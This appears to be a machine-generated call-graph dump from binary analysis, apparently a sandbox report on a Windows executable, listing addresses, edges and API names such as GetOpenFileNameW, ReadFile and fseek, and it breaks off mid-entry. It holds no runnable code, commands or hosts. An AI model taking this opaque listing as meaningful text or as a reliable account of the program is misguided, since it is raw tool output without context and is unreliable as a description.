86941 40cf00 53 API calls 86748->86941 86942 40e6a0 53 API calls 86748->86942 86752 402120 moneypunct 86750->86752 86751->86748 86752->86597 86754 4295c9 __call_reportfault 86753->86754 86755 40f53c 86753->86755 86757 4295d9 GetOpenFileNameW 86754->86757 87639 410120 86755->87639 86757->86755 86759 40d5f5 86757->86759 86758 40f545 87643 4102b0 SHGetMalloc 86758->87643 86759->86605 86759->86607 86761 40f54c 87648 410190 GetFullPathNameW 86761->87648 86763 40f559 87659 40f570 86763->87659 87721 402400 86765->87721 86767 40146f 86770 428c29 _wcscat 86767->86770 87730 401500 86767->87730 86769 40147c 86769->86770 87738 40d440 86769->87738 86772 401489 86772->86770 86773 401491 GetFullPathNameW 86772->86773 86774 402160 52 API calls 86773->86774 86775 4014bb 86774->86775 86776 402160 52 API calls 86775->86776 86777 4014c8 86776->86777 86777->86770 86778 402160 52 API calls 86777->86778 86779 4014ee 86778->86779 86779->86607 86781 428361 86780->86781 86782 4103fc LoadImageW RegisterClassExW 86780->86782 87758 44395e EnumResourceNamesW LoadImageW 86781->87758 87757 410490 7 API calls 86782->87757 86785 40d651 86787 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86785->86787 86786 428368 86787->86617 86789 409202 86788->86789 86790 42d7ad 86788->86790 86813 409216 moneypunct 86789->86813 88021 410940 331 API calls 86789->88021 88024 45e737 90 API calls 3 library calls 86790->88024 86793 409386 86794 40939c 86793->86794 88022 40f190 10 API calls 86793->88022 86794->86622 86854 401000 Shell_NotifyIconW __call_reportfault 86794->86854 86796 4095b2 86796->86794 86797 4095bf 86796->86797 88023 401a50 331 API calls 86797->88023 86798 409253 PeekMessageW 86798->86813 86800 40d410 VariantClear 86800->86813 86801 42d8cd Sleep 86801->86813 86802 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86802->86794 86805 4095f9 86802->86805 86804 42e13b 88042 40d410 VariantClear 86804->88042 86807 42e158 TranslateMessage DispatchMessageW GetMessageW 86805->86807 86807->86807 86810 42e188 86807->86810 86809 409567 PeekMessageW 86809->86813 86810->86794 86813->86793 86813->86798 86813->86800 86813->86801 86813->86804 86813->86809 86814 46f3c1 107 API calls 86813->86814 86815 40e0a0 52 API calls 86813->86815 86817 409551 TranslateMessage DispatchMessageW 86813->86817 86819 42dcd2 WaitForSingleObject 86813->86819 86823 42dd3d Sleep 86813->86823 86824 47d33e 309 API calls 86813->86824 86826 4094e0 86813->86826 86828 4094cf Sleep 86813->86828 86830 42d94d timeGetTime 86813->86830 86845 45e737 90 API calls 86813->86845 86848 42e0cc VariantClear 86813->86848 86849 408f40 VariantClear 86813->86849 87759 4091b0 86813->87759 87817 40afa0 86813->87817 87843 4096a0 86813->87843 87970 408fc0 86813->87970 88005 408cc0 86813->88005 88019 40d150 TranslateAcceleratorW 86813->88019 88020 40d170 IsDialogMessageW GetClassLongW 86813->88020 88025 465124 53 API calls 86813->88025 88026 40c620 timeGetTime 86813->88026 88041 40e270 VariantClear moneypunct 86813->88041 86814->86813 86815->86813 86816 46fdbf 108 API calls 86816->86826 86817->86809 86819->86813 86820 42dcf0 GetExitCodeProcess CloseHandle 86819->86820 88031 40d410 VariantClear 86820->88031 86822 44c29d 52 API calls 86822->86826 86823->86826 86824->86813 86826->86813 86826->86816 86826->86822 86832 40c620 timeGetTime 86826->86832 86835 42dd89 CloseHandle 86826->86835 86836 408f40 VariantClear 86826->86836 86838 465124 53 API calls 86826->86838 86839 42de19 GetExitCodeProcess CloseHandle 86826->86839 86842 42de88 Sleep 86826->86842 86850 401b10 52 API calls 86826->86850 86852 401980 53 API calls 86826->86852 88028 45178a 54 API calls 86826->88028 88029 47d33e 331 API calls 86826->88029 88030 453bc6 54 API calls 86826->88030 88032 40d410 VariantClear 86826->88032 88033 443d19 67 API calls _wcslen 86826->88033 88034 4574b4 VariantClear 86826->88034 88035 403cd0 86826->88035 88039 4731e1 VariantClear 86826->88039 88040 4331a2 6 API calls 86826->88040 86828->86826 88027 465124 53 API calls 86830->88027 86832->86826 86835->86826 86836->86826 86838->86826 86839->86826 86842->86813 86845->86813 86848->86813 86849->86813 86850->86826 86852->86826 86854->86622 86855->86607 86856->86614 86858 401b16 _wcslen 86857->86858 86859 4115d7 52 API calls 86858->86859 86862 401b63 86858->86862 86860 401b4b _memmove 86859->86860 86861 4115d7 52 API calls 86860->86861 86861->86862 86863 40d200 52 API calls 2 library calls 86862->86863 86863->86629 86864->86632 86866 40bc70 52 API calls 86865->86866 86867 401f31 86866->86867 86868 402560 86867->86868 86869 40256d __write_nolock 86868->86869 86870 402160 52 API calls 86869->86870 86872 402593 86870->86872 86874 4025bd 86872->86874 86943 401c90 86872->86943 86873 4026f0 52 API calls 86873->86874 86874->86873 86875 4026a7 86874->86875 86878 401b10 52 API calls 86874->86878 86881 401c90 52 API calls 86874->86881 86946 40d7c0 52 API calls 2 library calls 86874->86946 86876 4026db 86875->86876 86877 401b10 52 API calls 86875->86877 86876->86687 86879 4026d1 86877->86879 86878->86874 86947 40d7c0 52 API calls 2 library calls 86879->86947 86881->86874 86948 40f760 86883->86948 86886 410118 86886->86689 86888 42805d 86889 42806a 86888->86889 87004 431e58 86888->87004 86891 413748 _free 46 API calls 86889->86891 86892 428078 86891->86892 86893 431e58 82 API calls 86892->86893 86894 428084 86893->86894 86894->86689 86896 4115d7 52 API calls 86895->86896 86897 401f74 86896->86897 86897->86692 86899 4019a3 86898->86899 86905 401985 86898->86905 86900 4019b8 86899->86900 86899->86905 87628 403e10 53 API calls 86900->87628 86902 40199f 86902->86695 86904 4019c4 86904->86695 86905->86902 87627 403e10 53 API calls 86905->87627 86907 40c2c7 86906->86907 86908 40c30e 86906->86908 86909 40c2d3 86907->86909 86910 426c79 86907->86910 86911 40c315 86908->86911 86912 426c2b 86908->86912 87629 403ea0 52 API calls __cinit 86909->87629 87634 4534e3 52 API calls 86910->87634 86916 40c321 86911->86916 86917 426c5a 86911->86917 86914 426c4b 86912->86914 86915 426c2e 86912->86915 87632 4534e3 52 API calls 86914->87632 86918 40c2de 86915->86918 87631 4534e3 52 API calls 86915->87631 87630 403ea0 52 API calls __cinit 86916->87630 87633 4534e3 52 API calls 86917->87633 86918->86705 86925 401a30 86924->86925 86926 401a17 86924->86926 86928 402160 52 API calls 86925->86928 86927 401a2d 86926->86927 87635 403c30 52 API calls _memmove 86926->87635 86927->86709 86930 401a3d 86928->86930 86930->86709 86932 411523 86931->86932 86933 4114ba 86931->86933 87638 4113a8 58 API calls 3 library calls 86932->87638 86938 40200c 86933->86938 87636 417f77 46 API calls __getptd_noexit 86933->87636 86936 4114c6 87637 417f25 10 API calls __fclose_nolock 86936->87637 86938->86712 86938->86713 86939->86741 86940->86744 86941->86748 86942->86748 86944 4026f0 52 API calls 86943->86944 86945 401c97 86944->86945 86945->86872 86946->86874 86947->86876 87008 40f6f0 86948->87008 86950 40f77b _strcat moneypunct 87016 40f850 86950->87016 86955 427c2a 87046 414d04 86955->87046 86957 40f7fc 86957->86955 86958 40f804 86957->86958 87033 414a46 86958->87033 86963 40f80e 86963->86886 86967 4528bd 86963->86967 86964 427c59 87052 414fe2 86964->87052 86966 427c79 86968 4150d1 _fseek 81 API calls 86967->86968 86969 452930 86968->86969 87552 452719 86969->87552 86972 452948 86972->86888 86973 414d04 __fread_nolock 61 API calls 86974 452966 86973->86974 86975 414d04 __fread_nolock 61 API calls 86974->86975 86976 452976 86975->86976 86977 414d04 __fread_nolock 61 API calls 86976->86977 86978 45298f 86977->86978 86979 414d04 __fread_nolock 61 API calls 86978->86979 86980 4529aa 86979->86980 86981 4150d1 _fseek 81 API calls 86980->86981 86982 4529c4 86981->86982 86983 4135bb _malloc 46 API calls 86982->86983 86984 4529cf 86983->86984 86985 4135bb _malloc 46 API calls 86984->86985 86986 4529db 86985->86986 86987 414d04 __fread_nolock 61 API calls 86986->86987 86988 4529ec 86987->86988 86989 44afef GetSystemTimeAsFileTime 86988->86989 86990 452a00 86989->86990 86991 452a36 86990->86991 86992 452a13 86990->86992 86994 452aa5 86991->86994 86995 452a3c 86991->86995 86993 413748 _free 46 API calls 86992->86993 86997 452a1c 86993->86997 86996 413748 _free 46 API calls 86994->86996 87558 44b1a9 86995->87558 87001 452aa3 86996->87001 86999 413748 _free 46 API calls 86997->86999 87002 452a25 86999->87002 87000 452a9d 87003 413748 _free 46 API calls 87000->87003 87001->86888 87002->86888 87003->87001 87005 431e64 87004->87005 87006 431e6a 87004->87006 87007 414a46 __fcloseall 82 API calls 87005->87007 87006->86889 87007->87006 87009 425de2 87008->87009 87013 40f6fc _wcslen 87008->87013 87009->86950 87010 40f710 WideCharToMultiByte 87011 40f756 87010->87011 87012 40f728 87010->87012 87011->86950 87014 4115d7 52 API calls 87012->87014 87013->87010 87015 40f735 WideCharToMultiByte 87014->87015 87015->86950 87018 40f85d __call_reportfault _strlen 87016->87018 87017 426b3b 87018->87017 87020 40f7ab 87018->87020 87065 414db8 87018->87065 87021 4149c2 87020->87021 87080 414904 87021->87080 87023 40f7e9 87023->86955 87024 40f5c0 87023->87024 87025 40f5cd _strcat __write_nolock _memmove 87024->87025 87026 414d04 __fread_nolock 61 API calls 87025->87026 87028 425d11 87025->87028 87032 40f691 __tzset_nolock 87025->87032 87168 4150d1 87025->87168 87026->87025 87029 4150d1 _fseek 81 API calls 87028->87029 87030 425d33 87029->87030 87031 414d04 __fread_nolock 61 API calls 87030->87031 87031->87032 87032->86957 87034 414a52 _fseek 87033->87034 87035 414a64 87034->87035 87036 414a79 87034->87036 87308 417f77 46 API calls __getptd_noexit 87035->87308 87038 415471 __lock_file 47 API calls 87036->87038 87042 414a74 _fseek 87036->87042 87040 414a92 87038->87040 87039 414a69 87309 417f25 10 API calls __fclose_nolock 87039->87309 87292 4149d9 87040->87292 87042->86963 87377 414c76 87046->87377 87048 414d1c 87049 44afef 87048->87049 87545 442c5a 87049->87545 87051 44b00d 87051->86964 87053 414fee _fseek 87052->87053 87054 414ffa 87053->87054 87055 41500f 87053->87055 87549 417f77 46 API calls __getptd_noexit 87054->87549 87057 415471 __lock_file 47 API calls 87055->87057 87059 415017 87057->87059 87058 414fff 87550 417f25 10 API calls __fclose_nolock 87058->87550 87061 414e4e __ftell_nolock 51 API calls 87059->87061 87062 415024 87061->87062 87551 41503d LeaveCriticalSection LeaveCriticalSection __wfsopen 87062->87551 87063 41500a _fseek 87063->86966 87066 414dd6 87065->87066 87067 414deb 87065->87067 87076 417f77 46 API calls __getptd_noexit 87066->87076 87067->87066 87069 414df2 87067->87069 87078 41b91b 79 API calls 11 library calls 87069->87078 87070 414ddb 87077 417f25 10 API calls __fclose_nolock 87070->87077 87073 414e18 87074 414de6 87073->87074 87079 418f98 77 API calls 5 library calls 87073->87079 87074->87018 87076->87070 87077->87074 87078->87073 87079->87074 87083 414910 _fseek 87080->87083 87081 414923 87136 417f77 46 API calls __getptd_noexit 87081->87136 87083->87081 87085 414951 87083->87085 87084 414928 87137 417f25 10 API calls __fclose_nolock 87084->87137 87099 41d4d1 87085->87099 87088 414956 87089 41496a 87088->87089 87090 41495d 87088->87090 87092 414992 87089->87092 87093 414972 87089->87093 87138 417f77 46 API calls __getptd_noexit 87090->87138 87116 41d218 87092->87116 87139 417f77 46 API calls __getptd_noexit 87093->87139 87096 414933 _fseek @_EH4_CallFilterFunc@8 87096->87023 87100 41d4dd _fseek 87099->87100 87101 4182cb __lock 46 API calls 87100->87101 87114 41d4eb 87101->87114 87102 41d560 87141 41d5fb 87102->87141 87103 41d567 87104 416b04 __malloc_crt 46 API calls 87103->87104 87106 41d56e 87104->87106 87106->87102 87108 41d57c InitializeCriticalSectionAndSpinCount 87106->87108 87107 41d5f0 _fseek 87107->87088 87109 41d59c 87108->87109 87110 41d5af EnterCriticalSection 87108->87110 87113 413748 _free 46 API calls 87109->87113 87110->87102 87111 418209 __mtinitlocknum 46 API calls 87111->87114 87113->87102 87114->87102 87114->87103 87114->87111 87144 4154b2 47 API calls __lock 87114->87144 87145 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87114->87145 87117 41d23a 87116->87117 87118 41d255 87117->87118 87130 41d26c __wopenfile 87117->87130 87150 417f77 46 API calls __getptd_noexit 87118->87150 87120 41d421 87123 41d47a 87120->87123 87124 41d48c 87120->87124 87121 41d25a 87151 417f25 10 API calls __fclose_nolock 87121->87151 87155 417f77 46 API calls __getptd_noexit 87123->87155 87147 422bf9 87124->87147 87127 41499d 87140 4149b8 LeaveCriticalSection LeaveCriticalSection __wfsopen 87127->87140 87128 41d47f 87156 417f25 10 API calls __fclose_nolock 87128->87156 87130->87120 87130->87123 87152 41341f 58 API calls 2 library calls 87130->87152 87132 41d41a 87132->87120 87153 41341f 58 API calls 2 library calls 87132->87153 87134 41d439 87134->87120 87154 41341f 58 API calls 2 library calls 87134->87154 87136->87084 87137->87096 87138->87096 87139->87096 87140->87096 87146 4181f2 LeaveCriticalSection 87141->87146 87143 41d602 87143->87107 87144->87114 87145->87114 87146->87143 87157 422b35 87147->87157 87149 422c14 87149->87127 87150->87121 87151->87127 87152->87132 87153->87134 87154->87120 87155->87128 87156->87127 87159 422b41 _fseek 87157->87159 87158 422b54 87160 417f77 __fclose_nolock 46 API calls 87158->87160 87159->87158 87161 422b8a 87159->87161 87162 422b59 87160->87162 87164 422400 __tsopen_nolock 109 API calls 87161->87164 87163 417f25 __fclose_nolock 10 API calls 87162->87163 87167 422b63 _fseek 87163->87167 87165 422ba4 87164->87165 87166 422bcb __wsopen_helper LeaveCriticalSection 87165->87166 87166->87167 87167->87149 87171 4150dd _fseek 87168->87171 87169 4150e9 87199 417f77 46 API calls __getptd_noexit 87169->87199 87171->87169 87172 41510f 87171->87172 87181 415471 87172->87181 87173 4150ee 87200 417f25 10 API calls __fclose_nolock 87173->87200 87180 4150f9 _fseek 87180->87025 87182 415483 87181->87182 87183 4154a5 EnterCriticalSection 87181->87183 87182->87183 87184 41548b 87182->87184 87185 415117 87183->87185 87186 4182cb __lock 46 API calls 87184->87186 87187 415047 87185->87187 87186->87185 87188 415067 87187->87188 87189 415057 87187->87189 87191 415079 87188->87191 87202 414e4e 87188->87202 87257 417f77 46 API calls __getptd_noexit 87189->87257 87219 41443c 87191->87219 87196 4150b9 87232 41e1f4 87196->87232 87198 41505c 87201 415143 LeaveCriticalSection LeaveCriticalSection __wfsopen 87198->87201 87199->87173 87200->87180 87201->87180 87203 414e61 87202->87203 87204 414e79 87202->87204 87258 417f77 46 API calls __getptd_noexit 87203->87258 87205 414139 __fclose_nolock 46 API calls 87204->87205 87207 414e80 87205->87207 87210 41e1f4 __write 51 API calls 87207->87210 87208 414e66 87259 417f25 10 API calls __fclose_nolock 87208->87259 87211 414e97 87210->87211 87212 414f09 87211->87212 87214 414ec9 87211->87214 87218 414e71 87211->87218 87260 417f77 46 API calls __getptd_noexit 87212->87260 87215 41e1f4 __write 51 API calls 87214->87215 87214->87218 87216 414f64 87215->87216 87217 41e1f4 __write 51 API calls 87216->87217 87216->87218 87217->87218 87218->87191 87220 414477 87219->87220 87221 414455 87219->87221 87225 414139 87220->87225 87221->87220 87222 414139 __fclose_nolock 46 API calls 87221->87222 87223 414470 87222->87223 87261 41b7b2 77 API calls 6 library calls 87223->87261 87226 414145 87225->87226 87227 41415a 87225->87227 87262 417f77 46 API calls __getptd_noexit 87226->87262 87227->87196 87229 41414a 87263 417f25 10 API calls __fclose_nolock 87229->87263 87231 414155 87231->87196 87233 41e200 _fseek 87232->87233 87234 41e223 87233->87234 87235 41e208 87233->87235 87237 41e22f 87234->87237 87240 41e269 87234->87240 87284 417f8a 46 API calls __getptd_noexit 87235->87284 87286 417f8a 46 API calls __getptd_noexit 87237->87286 87238 41e20d 87285 417f77 46 API calls __getptd_noexit 87238->87285 87264 41ae56 87240->87264 87242 41e234 87287 417f77 46 API calls __getptd_noexit 87242->87287 87245 41e26f 87247 41e291 87245->87247 87248 41e27d 87245->87248 87246 41e23c 87288 417f25 10 API calls __fclose_nolock 87246->87288 87289 417f77 46 API calls __getptd_noexit 87247->87289 87274 41e17f 87248->87274 87252 41e215 _fseek 87252->87198 87253 41e289 87291 41e2c0 LeaveCriticalSection __unlock_fhandle 87253->87291 87254 41e296 87290 417f8a 46 API calls __getptd_noexit 87254->87290 87257->87198 87258->87208 87259->87218 87260->87218 87261->87220 87262->87229 87263->87231 87265 41ae62 _fseek 87264->87265 87266 41aebc 87265->87266 87267 4182cb __lock 46 API calls 87265->87267 87268 41aec1 EnterCriticalSection 87266->87268 87269 41aede _fseek 87266->87269 87270 41ae8e 87267->87270 87268->87269 87269->87245 87271 41aeaa 87270->87271 87272 41ae97 InitializeCriticalSectionAndSpinCount 87270->87272 87273 41aeec ___lock_fhandle LeaveCriticalSection 87271->87273 87272->87271 87273->87266 87275 41aded __lseek_nolock 46 API calls 87274->87275 87276 41e18e 87275->87276 87277 41e1a4 SetFilePointer 87276->87277 87278 41e194 87276->87278 87279 41e1c3 87277->87279 87280 41e1bb GetLastError 87277->87280 87281 417f77 __fclose_nolock 46 API calls 87278->87281 87282 41e199 87279->87282 87283 417f9d __dosmaperr 46 API calls 87279->87283 87280->87279 87281->87282 87282->87253 87283->87282 87284->87238 87285->87252 87286->87242 87287->87246 87288->87252 87289->87254 87290->87253 87291->87252 87293 4149ea 87292->87293 87294 4149fe 87292->87294 87338 417f77 46 API calls __getptd_noexit 87293->87338 87296 4149fa 87294->87296 87298 41443c __flush 77 API calls 87294->87298 87310 414ab2 LeaveCriticalSection LeaveCriticalSection __wfsopen 87296->87310 87297 4149ef 87339 417f25 10 API calls __fclose_nolock 87297->87339 87300 414a0a 87298->87300 87311 41d8c2 87300->87311 87303 414139 __fclose_nolock 46 API calls 87304 414a18 87303->87304 87315 41d7fe 87304->87315 87306 414a1e 87306->87296 87307 413748 _free 46 API calls 87306->87307 87307->87296 87308->87039 87309->87042 87310->87042 87312 414a12 87311->87312 87313 41d8d2 87311->87313 87312->87303 87313->87312 87314 413748 _free 46 API calls 87313->87314 87314->87312 87316 41d80a _fseek 87315->87316 87317 41d812 87316->87317 87318 41d82d 87316->87318 87355 417f8a 46 API calls __getptd_noexit 87317->87355 87320 41d839 87318->87320 87323 41d873 87318->87323 87357 417f8a 46 API calls __getptd_noexit 87320->87357 87321 41d817 87356 417f77 46 API calls __getptd_noexit 87321->87356 87327 41ae56 ___lock_fhandle 48 API calls 87323->87327 87325 41d83e 87358 417f77 46 API calls __getptd_noexit 87325->87358 87329 41d879 87327->87329 87328 41d846 87359 417f25 10 API calls __fclose_nolock 87328->87359 87331 41d893 87329->87331 87332 41d887 87329->87332 87360 417f77 46 API calls __getptd_noexit 87331->87360 87340 41d762 87332->87340 87333 41d81f _fseek 87333->87306 87336 41d88d 87361 41d8ba LeaveCriticalSection __unlock_fhandle 87336->87361 87338->87297 87339->87296 87362 41aded 87340->87362 87342 41d7c8 87375 41ad67 47 API calls 2 library calls 87342->87375 87343 41d772 87343->87342 87345 41aded __lseek_nolock 46 API calls 87343->87345 87354 41d7a6 87343->87354 87348 41d79d 87345->87348 87346 41aded __lseek_nolock 46 API calls 87349 41d7b2 CloseHandle 87346->87349 87347 41d7d0 87350 41d7f2 87347->87350 87376 417f9d 46 API calls 3 library calls 87347->87376 87351 41aded __lseek_nolock 46 API calls 87348->87351 87349->87342 87352 41d7be GetLastError 87349->87352 87350->87336 87351->87354 87352->87342 87354->87342 87354->87346 87355->87321 87356->87333 87357->87325 87358->87328 87359->87333 87360->87336 87361->87333 87363 41ae12 87362->87363 87364 41adfa 87362->87364 87366 417f8a __free_osfhnd 46 API calls 87363->87366 87369 41ae51 87363->87369 87365 417f8a __free_osfhnd 46 API calls 87364->87365 87367 41adff 87365->87367 87368 41ae23 87366->87368 87370 417f77 __fclose_nolock 46 API calls 87367->87370 87371 417f77 __fclose_nolock 46 API calls 87368->87371 87369->87343 87373 41ae07 87370->87373 87372 41ae2b 87371->87372 87374 417f25 __fclose_nolock 10 API calls 87372->87374 87373->87343 87374->87373 87375->87347 87376->87350 87378 414c82 _fseek 87377->87378 87379 414cc3 87378->87379 87380 414cbb _fseek 87378->87380 87386 414c96 __call_reportfault 87378->87386 87381 415471 __lock_file 47 API calls 87379->87381 87380->87048 87383 414ccb 87381->87383 87390 414aba 87383->87390 87384 414cb0 87405 417f25 10 API calls __fclose_nolock 87384->87405 87404 417f77 46 API calls __getptd_noexit 87386->87404 87394 414ad8 __call_reportfault 87390->87394 87396 414af2 87390->87396 87391 414ae2 87457 417f77 46 API calls __getptd_noexit 87391->87457 87393 414ae7 87458 417f25 10 API calls __fclose_nolock 87393->87458 87394->87391 87394->87396 87399 414b2d 87394->87399 87406 414cfa LeaveCriticalSection LeaveCriticalSection __wfsopen 87396->87406 87398 414c38 __call_reportfault 87460 417f77 46 API calls __getptd_noexit 87398->87460 87399->87396 87399->87398 87400 414139 __fclose_nolock 46 API calls 87399->87400 87407 41dfcc 87399->87407 87437 41d8f3 87399->87437 87459 41e0c2 46 API calls 3 library calls 87399->87459 87400->87399 87404->87384 87405->87380 87406->87380 87408 41dfd8 _fseek 87407->87408 87409 41dfe0 87408->87409 87410 41dffb 87408->87410 87530 417f8a 46 API calls __getptd_noexit 87409->87530 87412 41e007 87410->87412 87415 41e041 87410->87415 87532 417f8a 46 API calls __getptd_noexit 87412->87532 87413 41dfe5 87531 417f77 46 API calls __getptd_noexit 87413->87531 87419 41e063 87415->87419 87420 41e04e 87415->87420 87417 41e00c 87533 417f77 46 API calls __getptd_noexit 87417->87533 87424 41ae56 ___lock_fhandle 48 API calls 87419->87424 87535 417f8a 46 API calls __getptd_noexit 87420->87535 87421 41dfed _fseek 87421->87399 87422 41e014 87534 417f25 10 API calls __fclose_nolock 87422->87534 87426 41e069 87424->87426 87425 41e053 87536 417f77 46 API calls __getptd_noexit 87425->87536 87429 41e077 87426->87429 87430 41e08b 87426->87430 87461 41da15 87429->87461 87537 417f77 46 API calls __getptd_noexit 87430->87537 87433 41e083 87539 41e0ba LeaveCriticalSection __unlock_fhandle 87433->87539 87434 41e090 87538 417f8a 46 API calls __getptd_noexit 87434->87538 87438 41d900 87437->87438 87442 41d915 87437->87442 87543 417f77 46 API calls __getptd_noexit 87438->87543 87440 41d905 87544 417f25 10 API calls __fclose_nolock 87440->87544 87443 41d94a 87442->87443 87448 41d910 87442->87448 87540 420603 87442->87540 87445 414139 __fclose_nolock 46 API calls 87443->87445 87446 41d95e 87445->87446 87447 41dfcc __read 59 API calls 87446->87447 87449 41d965 87447->87449 87448->87399 87449->87448 87450 414139 __fclose_nolock 46 API calls 87449->87450 87451 41d988 87450->87451 87451->87448 87452 414139 __fclose_nolock 46 API calls 87451->87452 87453 41d994 87452->87453 87453->87448 87454 414139 __fclose_nolock 46 API calls 87453->87454 87455 41d9a1 87454->87455 87456 414139 __fclose_nolock 46 API calls 87455->87456 87456->87448 87457->87393 87458->87396 87459->87399 87460->87393 87462 41da31 87461->87462 87463 41da4c 87461->87463 87464 417f8a __free_osfhnd 46 API calls 87462->87464 87465 41da5b 87463->87465 87467 41da7a 87463->87467 87466 41da36 87464->87466 87468 417f8a __free_osfhnd 46 API calls 87465->87468 87471 417f77 __fclose_nolock 46 API calls 87466->87471 87470 41da98 87467->87470 87484 41daac 87467->87484 87469 41da60 87468->87469 87472 417f77 __fclose_nolock 46 API calls 87469->87472 87473 417f8a __free_osfhnd 46 API calls 87470->87473 87481 41da3e 87471->87481 87475 41da67 87472->87475 87477 41da9d 87473->87477 87474 41db02 87476 417f8a __free_osfhnd 46 API calls 87474->87476 87478 417f25 __fclose_nolock 10 API calls 87475->87478 87479 41db07 87476->87479 87480 417f77 __fclose_nolock 46 API calls 87477->87480 87478->87481 87482 417f77 __fclose_nolock 46 API calls 87479->87482 87483 41daa4 87480->87483 87481->87433 87482->87483 87487 417f25 __fclose_nolock 10 API calls 87483->87487 87484->87474 87484->87481 87485 41dae1 87484->87485 87486 41db1b 87484->87486 87485->87474 87493 41daec ReadFile 87485->87493 87488 416b04 __malloc_crt 46 API calls 87486->87488 87487->87481 87490 41db31 87488->87490 87496 41db59 87490->87496 87497 41db3b 87490->87497 87491 41dc17 87492 41df8f GetLastError 87491->87492 87500 41dc2b 87491->87500 87494 41de16 87492->87494 87495 41df9c 87492->87495 87493->87491 87493->87492 87504 417f9d __dosmaperr 46 API calls 87494->87504 87509 41dd9b 87494->87509 87498 417f77 __fclose_nolock 46 API calls 87495->87498 87501 420494 __lseeki64_nolock 48 API calls 87496->87501 87499 417f77 __fclose_nolock 46 API calls 87497->87499 87502 41dfa1 87498->87502 87503 41db40 87499->87503 87500->87509 87510 41dc47 87500->87510 87513 41de5b 87500->87513 87505 41db67 87501->87505 87506 417f8a __free_osfhnd 46 API calls 87502->87506 87507 417f8a __free_osfhnd 46 API calls 87503->87507 87504->87509 87505->87493 87506->87509 87507->87481 87508 413748 _free 46 API calls 87508->87481 87509->87481 87509->87508 87511 41dcab ReadFile 87510->87511 87520 41dd28 87510->87520 87514 41dcc9 GetLastError 87511->87514 87523 41dcd3 87511->87523 87512 41ded0 ReadFile 87515 41deef GetLastError 87512->87515 87521 41def9 87512->87521 87513->87509 87513->87512 87514->87510 87514->87523 87515->87513 87515->87521 87516 41ddec MultiByteToWideChar 87516->87509 87517 41de10 GetLastError 87516->87517 87517->87494 87518 41dda3 87526 41dd60 87518->87526 87527 41ddda 87518->87527 87519 41dd96 87522 417f77 __fclose_nolock 46 API calls 87519->87522 87520->87509 87520->87518 87520->87519 87520->87526 87521->87513 87525 420494 __lseeki64_nolock 48 API calls 87521->87525 87522->87509 87523->87510 87524 420494 __lseeki64_nolock 48 API calls 87523->87524 87524->87523 87525->87521 87526->87516 87528 420494 __lseeki64_nolock 48 API calls 87527->87528 87529 41dde9 87528->87529 87529->87516 87530->87413 87531->87421 87532->87417 87533->87422 87534->87421 87535->87425 87536->87422 87537->87434 87538->87433 87539->87421 87541 416b04 __malloc_crt 46 API calls 87540->87541 87542 420618 87541->87542 87542->87443 87543->87440 87544->87448 87548 4148b3 GetSystemTimeAsFileTime __aulldiv 87545->87548 87547 442c6b 87547->87051 87548->87547 87549->87058 87550->87063 87551->87063 87555 45272f __tzset_nolock _wcscpy 87552->87555 87553 44afef GetSystemTimeAsFileTime 87553->87555 87554 4528a4 87554->86972 87554->86973 87555->87553 87555->87554 87556 414d04 61 API calls __fread_nolock 87555->87556 87557 4150d1 81 API calls _fseek 87555->87557 87556->87555 87557->87555 87559 44b1bc 87558->87559 87560 44b1ca 87558->87560 87561 4149c2 116 API calls 87559->87561 87562 44b1e1 87560->87562 87563 4149c2 116 API calls 87560->87563 87564 44b1d8 87560->87564 87561->87560 87593 4321a4 87562->87593 87566 44b2db 87563->87566 87564->87000 87566->87562 87568 44b2e9 87566->87568 87567 44b224 87569 44b253 87567->87569 87570 44b228 87567->87570 87571 44b2f6 87568->87571 87573 414a46 __fcloseall 82 API calls 87568->87573 87597 43213d 87569->87597 87572 44b235 87570->87572 87575 414a46 __fcloseall 82 API calls 87570->87575 87571->87000 87576 44b245 87572->87576 87578 414a46 __fcloseall 82 API calls 87572->87578 87573->87571 87575->87572 87576->87000 87577 44b25a 87579 44b260 87577->87579 87580 44b289 87577->87580 87578->87576 87582 44b26d 87579->87582 87583 414a46 __fcloseall 82 API calls 87579->87583 87607 44b0bf 87580->87607 87584 44b27d 87582->87584 87586 414a46 __fcloseall 82 API calls 87582->87586 87583->87582 87584->87000 87585 44b28f 87616 4320f8 87585->87616 87586->87584 87589 44b2a2 87590 44b2b2 87589->87590 87592 414a46 __fcloseall 82 API calls 87589->87592 87590->87000 87591 414a46 __fcloseall 82 API calls 87591->87589 87592->87590 87594 4321cb 87593->87594 87596 4321b4 __tzset_nolock _memmove 87593->87596 87595 414d04 __fread_nolock 61 API calls 87594->87595 87595->87596 87596->87567 87598 4135bb _malloc 46 API calls 87597->87598 87599 432150 87598->87599 87600 4135bb _malloc 46 API calls 87599->87600 87601 432162 87600->87601 87602 4135bb _malloc 46 API calls 87601->87602 87603 432174 87602->87603 87604 4320f8 46 API calls 87603->87604 87605 432189 87603->87605 87606 432198 87604->87606 87605->87577 87606->87577 87608 44b18e 87607->87608 87612 44b0da 87607->87612 87626 43206e 79 API calls 87608->87626 87610 442caf 61 API calls 87610->87612 87611 44b194 87611->87585 87612->87608 87612->87610 87615 44b19d 87612->87615 87624 44b040 61 API calls 87612->87624 87625 442d48 79 API calls 87612->87625 87615->87585 87617 43210f 87616->87617 87618 432109 87616->87618 87619 432122 87617->87619 87621 413748 _free 46 API calls 87617->87621 87620 413748 _free 46 API calls 87618->87620 87622 413748 _free 46 API calls 87619->87622 87623 432135 87619->87623 87620->87617 87621->87619 87622->87623 87623->87589 87623->87591 87624->87612 87625->87612 87626->87611 87627->86902 87628->86904 87629->86918 87630->86918 87631->86918 87632->86917 87633->86918 87634->86918 87635->86927 87636->86936 87637->86938 87638->86938 87688 410160 87639->87688 87641 41012f GetFullPathNameW 87642 410147 moneypunct 87641->87642 87642->86758 87644 4102cb SHGetDesktopFolder 87643->87644 87647 410333 _wcsncpy 87643->87647 87645 4102e0 _wcsncpy 87644->87645 87644->87647 87646 41031c SHGetPathFromIDListW 87645->87646 87645->87647 87646->87647 87647->86761 87649 4101bb 87648->87649 87655 425f4a 87648->87655 87650 410160 52 API calls 87649->87650 87652 4101c7 87650->87652 87651 4114ab __wcsicoll 58 API calls 87651->87655 87692 410200 52 API calls 2 library calls 87652->87692 87654 425f6e 87654->86763 87655->87651 87655->87654 87656 4101d6 87693 410200 52 API calls 2 library calls 87656->87693 87658 4101e9 87658->86763 87660 40f760 128 API calls 87659->87660 87661 40f584 87660->87661 87662 429335 87661->87662 87663 40f58c 87661->87663 87666 